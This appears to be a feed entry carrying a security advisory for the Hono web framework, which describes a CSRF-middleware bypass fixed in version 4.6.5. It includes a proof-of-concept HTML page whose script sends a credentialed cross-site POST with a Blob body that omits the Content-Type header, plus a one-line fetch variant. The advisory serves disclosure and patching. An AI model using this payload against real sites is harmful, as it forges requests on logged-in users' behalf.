      <description>&lt;p&gt;Hono, a web framework, prior to version 4.6.5 is vulnerable to bypass of cross-site request forgery (CSRF) middleware by a request without Content-Type header. Although the CSRF middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe. This can allow an attacker to bypass CSRF protection implemented with Hono CSRF middleware. Version 4.6.5 fixes this issue.&lt;/p&gt;</description>

      <title>GHSA-2234-fmw7-43wr — Hono allows bypass of CSRF Middleware by a request without Content-Type header.</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-2234-fmw7-43wr</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: hono&lt;/p&gt;
&lt;p&gt;### Summary
Bypass CSRF Middleware by a request without Content-Type herader.&lt;/p&gt;
&lt;p&gt;### Details
Although the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.&lt;/p&gt;
&lt;p&gt;https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89&lt;/p&gt;
&lt;p&gt;### PoC
```server.js
// server.js
import { Hono } from &amp;#39;hono&amp;#39;
import { csrf }from &amp;#39;hono/csrf&amp;#39;
const app = new Hono()
app.use(csrf())
app.get(&amp;#39;/&amp;#39;, (c) =&amp;gt; {
  return c.html(&amp;#39;Hello Hono!&amp;#39;)
})
app.post(&amp;#39;/&amp;#39;, async (c) =&amp;gt; {
  console.log(&amp;#34;executed&amp;#34;)
  return c.text( await c.req.text())
})
Deno.serve(app.fetch)
```&lt;/p&gt;
&lt;p&gt;```poc.html
&amp;lt;!-- PoC.html --&amp;gt;
&amp;lt;script&amp;gt;
async function myclick() {
    await fetch(&amp;#34;http://evil.example.com&amp;#34;, {
    method: &amp;#34;POST&amp;#34;,
    credentials: &amp;#34;include&amp;#34;,
    body:new Blob([`test`],{}),
    });
}
&amp;lt;/script&amp;gt;
&amp;lt;input type=&amp;#34;button&amp;#34; onclick=&amp;#34;myclick()&amp;#34; value=&amp;#34;run&amp;#34; /&amp;gt;
```&lt;/p&gt;
&lt;p&gt;Similarly, the fetch API does not add a Content-Type header for requests that do not include a Body.
```PoC2.js
await fetch(&amp;#34;http://localhost:8000&amp;#34;, { method: &amp;#34;POST&amp;#34;, credentials: &amp;#34;include&amp;#34;});
```&lt;/p&gt;
&lt;p&gt;### Impact
Bypass csrf protection implemented with hono csrf middleware.&lt;/p&gt;</description>
